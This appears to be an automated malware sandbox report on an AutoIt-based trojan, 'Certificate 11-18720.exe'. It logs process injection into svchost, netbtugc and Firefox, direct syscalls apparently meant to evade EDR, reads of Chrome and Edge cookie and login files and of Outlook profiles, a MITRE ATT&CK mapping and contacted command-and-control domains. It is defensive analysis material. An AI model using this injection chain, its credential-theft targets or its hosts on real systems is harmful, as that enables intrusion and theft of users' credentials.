Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0386CA24 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0385EA2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03854A35 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h] (7 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03840A5B mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0386CA6F mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038DEA60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038ACA72 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h] (13 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038309AD mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038B89B3 mov esi, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038B89B3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038C69C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038649D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038FA9D3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038BE9E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038629F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038AE908 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038BC912 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03828918 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038B892A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038C892B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038B0946 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03904940 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03856962 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0387096E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0387096E mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0387096E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038D4978 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038BC97C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03830887 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038BC89D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0385E8C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_039008C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038FA8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0386C8F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038BC810 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03852835 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03852835 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03852835 mov eax, dword ptr fs:[00000030h]1_2_03852835
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005FA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_005FA66C
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005E8189 SetUnhandledExceptionFilter,0_2_005E8189
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005E81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005E81AC

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtOpenKeyEx: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtQueryValueKey: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe protection: read write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Thread register set: target process: 3716
            Source: C:\Windows\SysWOW64\netbtugc.exe | Thread APC queued: target process: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: B21008
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: 0_2_005FB106 LogonUserW
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: 0_2_005C3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: 0_2_0060411C SendInput,keybd_event
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: 0_2_006074E7 mouse_event
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Certificate 11-18720.exe"
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: 0_2_005FA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: 0_2_006071FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid
            Source: Certificate 11-18720.exe, AQvzsYASIFuMivlIGfCCjBw.exe, 00000002.00000002.4135159406.00000000010B1000.00000002.00000001.00040000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000002.00000000.1771036165.00000000010B0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: AQvzsYASIFuMivlIGfCCjBw.exe, 00000002.00000002.4135159406.00000000010B1000.00000002.00000001.00040000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000002.00000000.1771036165.00000000010B0000.00000002.00000001.00040000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000000.1922189522.0000000000BF0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: Certificate 11-18720.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
            Source: AQvzsYASIFuMivlIGfCCjBw.exe, 00000002.00000002.4135159406.00000000010B1000.00000002.00000001.00040000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000002.00000000.1771036165.00000000010B0000.00000002.00000001.00040000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000000.1922189522.0000000000BF0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: AQvzsYASIFuMivlIGfCCjBw.exe, 00000002.00000002.4135159406.00000000010B1000.00000002.00000001.00040000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000002.00000000.1771036165.00000000010B0000.00000002.00000001.00040000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000000.1922189522.0000000000BF0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: 0_2_005E65C4 cpuid
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: 0_2_0061091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: 0_2_0063B340 GetUserNameW
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: 0_2_005F1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: 0_2_005DDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo

            Stealing of Sensitive Information

            Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000003.00000002.4134816430.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4135693303.0000000000940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1849387117.0000000000E60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.4137332421.0000000004A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4134520381.0000000000450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1849178523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.4135588115.0000000005950000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1850001201.0000000006D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\netbtugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: Certificate 11-18720.exe | Binary or memory string: WIN_81
            Source: Certificate 11-18720.exe | Binary or memory string: WIN_XP
            Source: Certificate 11-18720.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
            Source: Certificate 11-18720.exe | Binary or memory string: WIN_XPe
            Source: Certificate 11-18720.exe | Binary or memory string: WIN_VISTA
            Source: Certificate 11-18720.exe | Binary or memory string: WIN_7
            Source: Certificate 11-18720.exe | Binary or memory string: WIN_8

            Remote Access Functionality

            Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000003.00000002.4134816430.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4135693303.0000000000940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1849387117.0000000000E60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.4137332421.0000000004A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4134520381.0000000000450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1849178523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.4135588115.0000000005950000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1850001201.0000000006D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: 0_2_00618C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: 0_2_0061923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket
            MITRE ATT&CK Matrix

            The rendered matrix did not survive extraction. Techniques with matched signatures, grouped by tactic; the number in parentheses is the signature-count badge as extracted:

            Reconnaissance: no matched techniques
            Resource Development: no matched techniques
            Initial Access: Valid Accounts (2)
            Execution: Native API (2)
            Persistence: DLL Side-Loading (1); Valid Accounts (2)
            Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412)
            Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (2); Access Token Manipulation (21); Process Injection (412)
            Credential Access: OS Credential Dumping (1); Input Capture (21)
            Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (116); Security Software Discovery (151); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1)
            Lateral Movement: no matched techniques
            Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3)
            Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4)
            Exfiltration: no matched techniques
            Impact: System Shutdown/Reboot (1)
            Behavior Graph (ID: 1562576; Sample: Certificate 11-18720.exe_; Startdate: 25/11/2024; Architecture: WINDOWS; Score: 100)

            The rendered graph did not survive extraction; its nodes and edges, as extracted:

            Start node: DNS/IP: www.joyesi.xyz, www.techchains.info, 15 other IPs or domains. Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 6 other signatures. On www.joyesi.xyz: Performs DNS queries to domains with low reputation.
            Certificate 11-18720.exe (started): Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process. Starts svchost.exe.
            svchost.exe (started): Maps a DLL or memory area into another process. Injects into AQvzsYASIFuMivlIGfCCjBw.exe.
            AQvzsYASIFuMivlIGfCCjBw.exe (injected): Found direct / indirect Syscall (likely to bypass EDR). Starts netbtugc.exe.
            netbtugc.exe (started): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures. Injects into AQvzsYASIFuMivlIGfCCjBw.exe; starts firefox.exe.
            AQvzsYASIFuMivlIGfCCjBw.exe (injected, second instance): DNS/IP: www.rssnewscast.com 91.195.240.94, ports 49937, 49944, 49950 (SEDO-ASDE, Germany); elettrosistemista.zip 195.110.124.133, ports 50019, 50020, 50021 (REGISTER-ASIT, Italy); 5 other IPs or domains. Found direct / indirect Syscall (likely to bypass EDR).
            Source | Detection | Scanner | Label | Link
            Certificate 11-18720.exe | 96% | ReversingLabs | Win32.Trojan.AutoitInject |
            Certificate 11-18720.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            elettrosistemista.zip
            195.110.124.133
            truefalse
              high
              empowermedeco.com
              217.196.55.202
              truefalse
                high
                www.3xfootball.com
                154.215.72.110
                truefalse
                  high
                  www.goldenjade-travel.com
                  116.50.37.244
                  truefalse
                    high
                    www.rssnewscast.com
                    91.195.240.94
                    truefalse
                      high
                      www.techchains.info
                      66.29.149.46
                      truefalse
                        high
                        natroredirect.natrocdn.com
                        85.159.66.93
                        truefalse
                          high
                          www.magmadokum.com
                          unknown
                          unknownfalse
                            high
                            www.donnavariedades.com
                            unknown
                            unknownfalse
                              high
                              www.660danm.top
                              unknown
                              unknownfalse
                                high
                                www.joyesi.xyz
                                unknown
                                unknownfalse
                                  high
                                  www.liangyuen528.com
                                  unknown
                                  unknownfalse
                                    high
                                    www.kasegitai.tokyo
                                    unknown
                                    unknownfalse
                                      high
                                      www.empowermedeco.com
                                      unknown
                                      unknownfalse
                                        high
                                        www.elettrosistemista.zip
                                        unknown
                                        unknownfalse
                                          high
